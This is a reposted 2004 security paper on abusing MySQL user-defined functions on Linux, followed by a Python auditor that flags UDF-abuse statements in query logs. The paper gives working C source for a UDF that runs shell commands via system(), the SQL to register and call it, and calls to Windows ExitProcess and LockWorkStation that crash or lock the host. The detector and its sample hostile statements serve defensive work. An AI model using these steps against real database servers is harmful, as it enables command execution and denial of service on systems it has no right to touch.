Use of MySQL user-defined functions (UDFs) in Linux

Source: Internet
Author: User

The use of MySQL user-defined functions (UDFs) in Linux
Chris Anley [chris@ngssoftware.com]
5th July 2004

MySQL provides an extensibility mechanism for its function family: you can create user-defined functions (UDFs for short) by building a dynamic library that contains them. UDFs are added with the CREATE FUNCTION statement, or by entering information into the mysql.func table to load them. When MySQL loads these dynamic libraries, the file path of the dynamic library must be accessible by MySQL.

Attackers abuse this mechanism by creating a malicious dynamic library and writing it to an available directory with a SELECT ... INTO OUTFILE statement. Once the file has been created, the attacker inserts a row into the mysql.func table to configure MySQL to load the library and execute its functions.

The following is a fairly simple UDF library (forgive it for being very simple) (foreigners are very polite!):

    #include <stdio.h>
    #include <stdlib.h>

    /*
    compile with something like
    gcc -g -c example -g -shared -W1,-soname,so_system.so.0 -o so_system.so.0.0 so_system.o -lc
    */

    enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};

    typedef struct st_udf_args
    {
        unsigned int arg_count;       /* Number of arguments */
        enum Item_result *arg_type;   /* Pointer to item_results */
        char **args;                  /* Pointer to argument */
        unsigned long *lengths;       /* Length of string arguments */
        char *maybe_null;             /* Set to 1 for all maybe_null args */
    } UDF_ARGS;

    typedef struct st_udf_init
    {
        char maybe_null;              /* 1 if function can return NULL */
        unsigned int decimals;        /* for real functions */
        unsigned long max_length;     /* For string functions */
        char *ptr;                    /* free pointer for function data */
        char const_item;              /* 0 if result is independent of arguments */
    } UDF_INIT;

    int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
    {
        /* Expects exactly one argument: the command string. */
        if (args->arg_count != 1)
            return 0;

        system(args->args[0]);

        return 0;
    }

The function is added like this:

    mysql> create function do_system returns integer soname 'so_system.so';
    Query OK, 0 rows affected (0.00 sec)

The mysql.func table now looks like this. Of course, you can also use UPDATE to modify it.

    mysql> select * from mysql.func;
    +-----------+-----+--------------+----------+
    | name      | ret | dl           | type     |
    +-----------+-----+--------------+----------+
    | do_system |   2 | so_system.so | function |
    +-----------+-----+--------------+----------+
    1 row in set (0.00 sec)

Calling the function:

    mysql> select do_system('ls>/tmp/test.txt');
    +-------------------------------+
    | do_system('ls>/tmp/test.txt') |
    +-------------------------------+
    |          -4665733612002344960 |
    +-------------------------------+
    1 row in set (0.02 sec)

Even if file permissions do not allow an attacker to create their own dynamic library file on the target system, they may still be able to misuse existing functions. The difficulty for the attacker is that the parameter list of an existing function does not match the MySQL UDF function prototype:

    int xxx(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)

A sophisticated attacker might be able to find a controllable flaw in an existing system library and call into it to execute arbitrary code, but this is still difficult.

Even so, when MySQL parses and executes the passed parameters, it is still possible to perform "bad" tasks through functions in existing dynamic libraries. For example, on Windows you can call the function ExitProcess as a MySQL UDF, which makes the server exit immediately, even if you do not have the shutdown permission in MySQL.

    mysql> create function ExitProcess returns integer soname 'kernel32';
    Query OK, 0 rows affected (0.17 sec)

    mysql> select exitprocess();
    ERROR 2013: lost connection to MySQL server during query

You can also lock the logon session of the current workstation (equivalent to Ctrl+Alt+Del):

    mysql> create function LockWorkStation returns integer soname 'user32';
    Query OK, 0 rows affected (0.00 sec)

    mysql> select LockWorkStation();
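For defenders, the three steps described above (a library written out from SQL, a UDF registered with SONAME, a direct write to mysql.func) each leave a recognizable statement in a query log. The following is an added example, not code from the original paper: a small auditor over statement text, where the allowlist entry, the sample statements and the rule names are constructed assumptions, and INTO DUMPFILE is covered alongside the INTO OUTFILE form the text names.

```python
import re

# Assumption: libraries this server is expected to load UDFs from (hypothetical name).
ALLOWED_LIBS = {"lib_audit_ok.so"}

CREATE_UDF = re.compile(
    r"\bcreate\s+(?:aggregate\s+)?function\s+(\w+)\s+returns\s+\w+\s+soname\s+'([^']*)'",
    re.I)
FUNC_WRITE = re.compile(
    r"\b(?:insert\s+(?:ignore\s+)?into|replace\s+into|update)\s+`?mysql`?\.`?func`?(?!\w)",
    re.I)
# INTO DUMPFILE is the single-row sibling of INTO OUTFILE; both write server-side files.
FILE_WRITE = re.compile(r"\binto\s+(?:outfile|dumpfile)\s+'([^']*)'", re.I)
# Matches names such as x.so, x.so.0.0 and x.dll.
LIB_NAME = re.compile(r"\.(?:so|dll)(?:\.\d+)*$", re.I)


def audit_statements(statements, allowed_libs=ALLOWED_LIBS):
    """Return (index, rule, detail) for each statement matching a UDF-abuse pattern."""
    findings = []
    for i, sql in enumerate(statements):
        m = CREATE_UDF.search(sql)
        if m and m.group(2).lower() not in allowed_libs:
            findings.append((i, "udf-from-unlisted-library",
                             f"{m.group(1)} <- {m.group(2)}"))
        if FUNC_WRITE.search(sql):
            findings.append((i, "direct-write-to-mysql.func", sql.strip()))
        m = FILE_WRITE.search(sql)
        if m and LIB_NAME.search(m.group(1)):
            findings.append((i, "library-written-from-sql", m.group(1)))
    return findings


# Constructed sample statements, one per entry, as a statement log might record them.
SAMPLE = [
    "select name from customers where id = 7",
    "create function do_system returns integer soname 'so_system.so'",
    "CREATE FUNCTION LockWorkStation RETURNS INTEGER SONAME 'user32'",
    "update mysql.func set dl = 'other.so' where name = 'do_system'",
    "select report from t into outfile '/tmp/report.csv'",
    "select data from staging into outfile '/tmp/so_system.so.0.0'",
    "create function audit_ok returns string soname 'lib_audit_ok.so'",
]

if __name__ == "__main__":
    for idx, rule, detail in audit_statements(SAMPLE):
        print(f"statement {idx}: {rule}: {detail}")
```

The same allowlist comparison can be run periodically against the rows of mysql.func itself, which also catches entries added while statement logging was off.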
